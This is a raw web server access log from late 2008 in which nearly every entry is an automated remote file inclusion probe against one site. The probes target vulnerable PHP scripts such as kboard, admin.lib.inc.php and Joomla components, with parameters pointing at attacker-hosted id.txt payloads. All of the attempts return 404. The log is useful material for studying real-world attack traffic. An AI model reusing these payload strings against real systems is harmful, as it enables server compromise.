62.141.48.87 - - [02/Nov/2008:22:58:43 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:58:46 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:22:58:52 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:59:53 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:59:55 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:22:59:55 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:23:00:25 -0800] "GET /logs/access.log%20%20//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:00:32 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:23:01:34 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:02:03 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:02:04 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:23:02:06 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.l2reloaded.org/editor/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:23:02:06 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.l2reloaded.org/editor/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
207.150.183.60 - - [02/Nov/2008:23:02:06 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.l2reloaded.org/editor/robots.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:04:23 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:04:23 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:04:23 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:04:34 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:04:34 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:04:34 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:05:12 -0800] "GET /logs/access.log///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:05:12 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:05:13 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:23:05:56 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:23:12:39 -0800] "GET /logs/access.log//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [02/Nov/2008:23:15:50 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://replicadisks.ru/components/com_xmap/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
70.85.192.194 - - [02/Nov/2008:23:17:40 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
70.85.192.194 - - [02/Nov/2008:23:17:40 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
70.85.192.194 - - [02/Nov/2008:23:17:40 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
70.85.192.194 - - [02/Nov/2008:23:19:17 -0800] "GET /logs/access_080804.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:19:39 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:19:39 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:19:39 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:20:00 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:20:00 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.25.221.5 - - [02/Nov/2008:23:20:01 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:24:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:24:05 -0800] "GET /logs/access_080901.log//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [02/Nov/2008:23:24:16 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.graynwhite.com/phpauction/data/file/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
62.141.48.87 - - [02/Nov/2008:23:26:09 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.141.48.87 - - [02/Nov/2008:23:26:09 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:26:43 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:26:43 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:26:43 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
62.141.48.87 - - [02/Nov/2008:23:28:06 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
62.141.48.87 - - [02/Nov/2008:23:28:06 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bodez.us/template/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:23:31:11 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:23:31:11 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
64.38.4.3 - - [02/Nov/2008:23:31:11 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:31:28 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:31:28 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:31:28 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://guitar3.com/child.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:32:33 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:32:33 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:32:33 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:34:40 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:34:40 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:23:36:24 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:23:36:52 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:23:36:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:23:36:53 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.90.127.34 - - [02/Nov/2008:23:37:32 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.90.127.34 - - [02/Nov/2008:23:37:32 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:38:06 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:38:06 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:38:06 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:10 -0800] "GET /logs/access_080804.log//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:11 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:11 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:24 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:25 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:25 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:42:41 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
74.6.22.106 - - [02/Nov/2008:23:44:22 -0800] "GET /logs/access_080728.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
80.90.127.34 - - [02/Nov/2008:23:45:33 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.90.127.34 - - [02/Nov/2008:23:45:33 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.90.127.34 - - [02/Nov/2008:23:45:34 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
91.192.241.74 - - [02/Nov/2008:23:46:31 -0800] "GET /logs/access_080811.log//include/admin.lib.inc.php?site_path=http://www.techcadre.com/secondaryeducation/search//include/greper.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
201.245.18.122 - - [02/Nov/2008:23:46:36 -0800] "GET /logs/access.log//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
201.245.18.122 - - [02/Nov/2008:23:46:36 -0800] "GET /vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
201.245.18.122 - - [02/Nov/2008:23:46:36 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
77.221.151.34 - - [02/Nov/2008:23:46:57 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.davemaster.com/dotproject/files//idv6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:47:23 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:47:23 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:47:26 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:49:24 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:49:24 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
66.40.52.30 - - [02/Nov/2008:23:49:24 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:51:29 -0800] "GET /vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:51:29 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
79.170.90.64 - - [02/Nov/2008:23:51:29 -0800] "GET /logs/access.log//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:53:35 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:53:35 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:53:35 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:23:54:25 -0800] "GET /logs/access.log//vwar/backup/errors.php?error=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:23:54:25 -0800] "GET /vwar/backup/errors.php?error=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
202.171.190.140 - - [02/Nov/2008:23:54:25 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.parcornithologique.com/forum/conf/ididon?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
89.218.85.18 - - [02/Nov/2008:23:55:52 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
